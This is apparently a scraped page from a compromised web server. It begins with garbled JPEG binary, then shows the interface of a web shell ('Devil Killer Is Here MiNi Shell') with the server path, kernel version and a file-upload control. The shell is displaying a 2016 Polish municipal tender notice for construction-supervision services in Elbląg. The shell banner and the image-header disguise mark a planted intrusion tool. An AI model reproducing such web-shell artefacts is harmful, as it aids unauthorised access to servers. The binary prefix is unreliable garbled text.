JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160629/110071-N-2016.html

<p class="kh_header"><b>Elbląg: Pełnienie funkcji Inżyniera Budowy przy realizacji przebudowy ul. Studziennej w Elblągu wraz z budową oświetlenia ulicznego, kanalizacji deszczowej oraz sieci telekomunikacyjnej</b><br>
<b>Numer ogłoszenia: 110071 - 2016; data zamieszczenia: 29.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Budowy przy realizacji przebudowy ul. Studziennej w Elblągu wraz z budową oświetlenia ulicznego, kanalizacji deszczowej oraz sieci telekomunikacyjnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: 
Pełnienie funkcji Inżyniera Budowy przy realizacji przebudowy ul. Studziennej w Elblągu wraz z budową oświetlenia ulicznego, kanalizacji deszczowej oraz sieci telekomunikacyjnej
 Przedmiot główny:
CPV: 71.24.70.00-1  Nazewnictwo wg CPV:  Nadzór nad robotami budowlanymi
Przedmiot zamówienia, obejmuje zarządzanie i nadzór nad realizacją robót budowlanych polegających na przebudowie ul. Studziennej w Elblągu wraz z budową oświetlenia ulicznego, kanalizacji deszczowej oraz sieci telekomunikacyjnej.
Zadanie inwestycyjne realizowane będzie w oparciu o niżej wymienioną kompleksową dokumentację  projektową  opracowaną przez Biuro Projektów Budownictwa Komunalnego Sp. z o.o. ul. Wigilijna 6-7, 82-300 Elbląg. Realizacja inwestycji zakłada m.in.:
- przebudowę ul. Studziennej,
- budowę oświetlenia ulicznego,
- budowę kanalizacji deszczowej,
- budowę sieci telekomunikacyjnej. 

Dokumentacja projektowa pn. Przebudowa ulic Studziennej, Wieżowej, Rybackiej:
1) PRZEDMIARY ROBÓT
2) PROJEKTY BUDOWLANE: 
a. PROJEKT ZAGOSPODAROWANIA TERENU + DROGI
b. PROJEKT OŚWIETLENIA I USUNIĘCIA KOLIZJI Z SIECIAMI 
    EKTROENERGETYCZNYMI 
c. KANALIZACJA DESZCZOWA Z USUNIĘCIEM KOLIZJI Z SIECIAMI WOD.-KAN.
d. TELEKOMUNIKACYJNE
3) PROJEKTY WYKONAWCZE: 
a. PROJEKT DROGOWY
b. PROJEKT OŚWIETLENIA I USUNIĘCIA KOLIZJI Z SIECIAMI 
    EKTROENERGETYCZNYMI 
c. KANALIZACJA DESZCZOWA Z USUNIĘCIEM KOLIZJI Z SIECIAMI WOD.-KAN.
d. TELEKOMUNIKACYJNE
e. SPECYFIKACJE TECHNICZNE WYKONANIA I ODBIORU ROBÓT

Zamawiający informuje, że w celu zapoznania Wykonawców z zakresem inwestycji, dla której będzie pełniona usługa, dokumentację projektową i inne dokumenty (udostępniane wyłącznie w wersji elektronicznej), o których mowa powyżej, zamieścił na stronie internetowej pod linkiem:
http://www.umelblag.pl/urzad_m/wydzialy/wzp_pliki/46_SIWZ_zal_3_7_8.zip

2. Zakres usługi, stanowiącej przedmiot zamówienia obejmuje:

1)	Zarządzanie, kierowanie i pełnienie funkcji Inżyniera Budowy w trakcie realizacji przedsięwzięcia budowlanego.

2) Prowadzenie rozliczeń bieżących (w trakcie trwania inwestycji).

3) Rozliczenie inwestycji i przygotowanie przekazania środków trwałych.

4) Obsługa okresu gwarancyjnego wykonanych robót z tytułu gwarancji jakości i rękojmi.

5)	Wykonanie analizy dokumentacji projektowej wraz ze szczegółowymi specyfikacjami technicznymi, przedmiarami, na podstawie której realizowana będzie inwestycja oraz sporządzenie raportu z tej analizy wraz z podaniem wniosków w zakresie ewentualnej korekty i wykonaniem tej korekty. 

6)	Wykonanie przedmiarów w układzie specyfikacyjnymi na podstawie przedmiarów w układzie knr, wykonanej analizy, o której mowa w  ppkt 5) i wskazań Zamawiającego.

7) Zastąpienie znaków handlowych w dokumentacji projektowej budowy oświetlenia i usunięcia kolizji z sieciami elektroenergetycznymi przez wskazanie cech charakterystycznych, funkcjonalnych, żywotności produktu i innych ważnych cech dla prawidłowego wykonania zadania oraz wykonanie wersji elektronicznej dokumentacji projektowej w formacie pdf bez znaków handlowych.

8) Przygotowanie procesu inwestycyjnego.

Analiza, weryfikacji ocena kompletności dokumentacji projektowych, o których mowa w pkt III ppkt 1. SIWZ musi być wykonana przez osobę z wymaganymi uprawnieniami budowlanymi niezależną od autora projektu.   

3. Informacje, w oparciu o które realizowana będzie usługa, stanowiąca przedmiot niniejszego zamówienia:

1) Wykonawca (Inżynier) musi zapewnić i pokryć koszty nadzoru ze strony przedstawicieli firm branżowych nad usuwaniem kolizji z sieciami teletechnicznymi, zgodnie z branżowymi warunkami technicznymi nadzoru.

2)	Wszelkie projekty organizacji ruchu na czas realizacji inwestycji opracowane przez wykonawcę robót muszą zostać zatwierdzone przez Policję oraz organ zarządzający ruchem drogowym, którego funkcje w imieniu Prezydenta Miasta Elbląga realizuje Departament Zarząd Dróg Urzędu Miejskiego w Elblągu.

3) Zamawiający dokonał zgłoszenia do właściwego organu o zamiarze wykonania robót budowlanych polegających na przebudowie ul. Studziennej, organ nie wniósł sprzeciwu oraz dysponuje pozwoleniem na budowę oświetlenia ulicznego, kanalizacji deszczowej oraz sieci telekomunikacyjnej w ramach Przebudowy ulicy Studziennej. 

4) Wykonawca (Inżynier) musi zapewnić stały nadzór archeologiczny nad całą inwestycją, w trakcie prowadzenia prac ziemnych, uzyskać w imieniu Zamawiającego przed rozpoczęciem robót budowlanych pozwolenie Wojewódzkiego Konserwatora Zabytków zgodnie z art. 36, ust 1, pkt 5 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz. U.z 2014 poz. 1446 z późn. zm.) zgodnie z pozwoleniem nr 389/2013 Wojewódzkiego Urzędu Ochrony Zabytków w Olsztynie nr L.dz.ZN.I.5142.196.2013.jd z dnia 09.09.2013 r.  

5) Przedstawicielem Zamawiającego przy realizacji przedmiotu zamówienia, jest Kierownik Referatu Inwestycji Drogowych w Departamencie Zarząd Dróg Urzędu Miejskiego w Elblągu.

4.	Biuro Inżyniera Budowy musi być zlokalizowane w Elblągu. Biuro Inżyniera Budowy musi być przystosowane do prowadzenia narad budowy, tj. być wyposażone w salę, w sprzęt biurowy oraz inne niezbędne narzędzia zapewniające przeprowadzenie narad w sposób optymalny.  	

5.	Wykonawca (Inżynier), którego oferta zostanie wybrana jako najkorzystniejsza, zobowiązany będzie do przedstawienia w ciągu 10 dni od daty podpisania umowy polisy ubezpieczeniowej od odpowiedzialności cywilnej z tytułu skutków działalności Wykonawcy (Inżyniera).

6.	Zamawiający wymaga udzielenia 60 miesięcy rękojmi.

Szczegółowe wymagania Zamawiającego / obowiązki Wykonawcy określone są we wzorze umowy stanowiącym ZAŁĄCZNIK NR 3 do SIWZ.   

7.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia na usługi.

8.	Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. Zamawiający żąda podania przez Wykonawcę w ofercie nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:
                     1.500,00 złotych (słownie: jeden tysiąc pięćset złotych),
Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
-	w pieniądzu,
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych, 
-	w gwarancjach ubezpieczeniowych, 
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
NR 13 1030 1218 0000 0000 9030 1632
Wadium wnoszone w innej formie niż w pieniądzu (oryginał dokumentu) należy zdeponować w sekretariacie Referatu Księgowości Jednostki Budżetowej w Departamencie Skarbnika Miasta Urzędu Miejskiego w Elblągu.
2.	Wykonawca, który nie wniesie wadium na okres związania ofertą zostanie przez Zamawiającego wykluczony z postępowania.
3.	Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.	Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie, w sposób należyty w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 usług, z których każda polegała na zarządzaniu i nadzorze nad realizacją zadania inwestycyjnego polegającego na budowie lub przebudowie dróg  zlokalizowanych w całości w obszarze zabudowanym, w tym jedno zadanie musi dotyczyć zarządzania i nadzoru nad realizacją zadania inwestycyjnego polegającego na budowie lub przebudowie drogi o nawierzchni z kostki kamiennej zlokalizowanej w obszarze objętym ochroną konserwatora zabytków.  
Jako datę wykonania (tj. zakończenia) usługi zarządzania i nadzoru Zamawiający rozumie datę wykonania (tj. zakończenia) robót budowlanych, bez obsługi okresu gwarancyjnego.
Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnianiu warunku, tj. liczba wykonanych usług, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest dysponowanie osobami zdolnymi do wykonania zamówienia, tj.:
a.	Inżynierem Budowy/Inspektorem nadzoru branży drogowej, który musi posiadać wykształcenie wyższe techniczne budowlane, minimum 5 lat doświadczenia jako inspektor nadzoru w swojej branży, uprawnienia budowlane o specjalności drogowej lub równoważne, musi posiadać doświadczenie w nadzorowaniu i zarządzaniu przynajmniej 2 kontraktami, związanymi z realizacją inwestycji dotyczącej budowy lub przebudowy dróg zlokalizowanych w całości w obszarze zabudowanym, w tym jedno zadanie musi dotyczyć zarządzania i nadzoru nad realizacją zadania inwestycyjnego polegającego na budowie lub przebudowie drogi o nawierzchni z kostki kamiennej zlokalizowanej w obszarze objętym ochroną konserwatora zabytków,  
b. Inspektorem nadzoru branży wod. - kan., który musi posiadać wykształcenie minimum techniczne budowlane, minimum 3 lata doświadczenia jako inspektor nadzoru w swojej branży, uprawnienia budowlane o specjalności wod. - kan.,       
c.	Inspektorem nadzoru branży gazowej, który musi posiadać wykształcenie minimum techniczne budowlane, minimum 3 lata doświadczenia jako inspektor nadzoru w swojej branży, uprawnienia budowlane o specjalności gazowej,
d.	Inspektorem nadzoru branży elektroenergetycznej, który musi posiadać wykształcenie minimum  techniczne budowlane, minimum 3 lata doświadczenia jako inspektor nadzoru w swojej branży, uprawnienia budowlane o specjalności elektroenergetycznej,			
e.	Inspektorem nadzoru branży teletechnicznej, który musi posiadać wykształcenie minimum techniczne budowlane, minimum 3 lata doświadczenia jako inspektor nadzoru w swojej branży, uprawnienia budowlane o specjalności teletechnicznej 
	
Zamawiający informuje, że  Wykonawca może wskazać jedną osobę do pełnienia więcej niż jednej funkcji, pod warunkiem spełnienia wymagań określonych w a) - e) dla tych osób.
Zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane, samodzielne funkcje techniczne w budownictwie mogą wykonywać wyłącznie osoby posiadające wymagane uprawnienia budowlane, będące członkami właściwych izb samorządu zawodowego (t.j. Dz.U. 2013 poz. 1409 z późn. zm.).
Wydanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie nabytych w państwach członkowskich UE oraz wpis do stosownej izby odbywa się po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 poz. 65).

potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.3. i 1.4. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wykazania przez Wykonawcę w wykazie dotyczy usług polegających na wykonaniu usług, polegających na zarządzaniu i nadzorze nad realizacją zadania inwestycyjnego polegającego na budowie lub przebudowie dróg  zlokalizowanych w całości w obszarze zabudowanym, w tym dotycząca zarządzania i nadzoru nad realizacją zadania inwestycyjnego polegającego na budowie lub przebudowie drogi o nawierzchni z kostki kamiennej zlokalizowanej w obszarze objętym ochroną konserwatora zabytków. 
Dowody, że usługi zostały wykonane należycie, należy złożyć tylko do wskazanych w wykazie usług, o których mowa w sekcji III.3.2 ) ogłoszenia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga: 
a)	Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
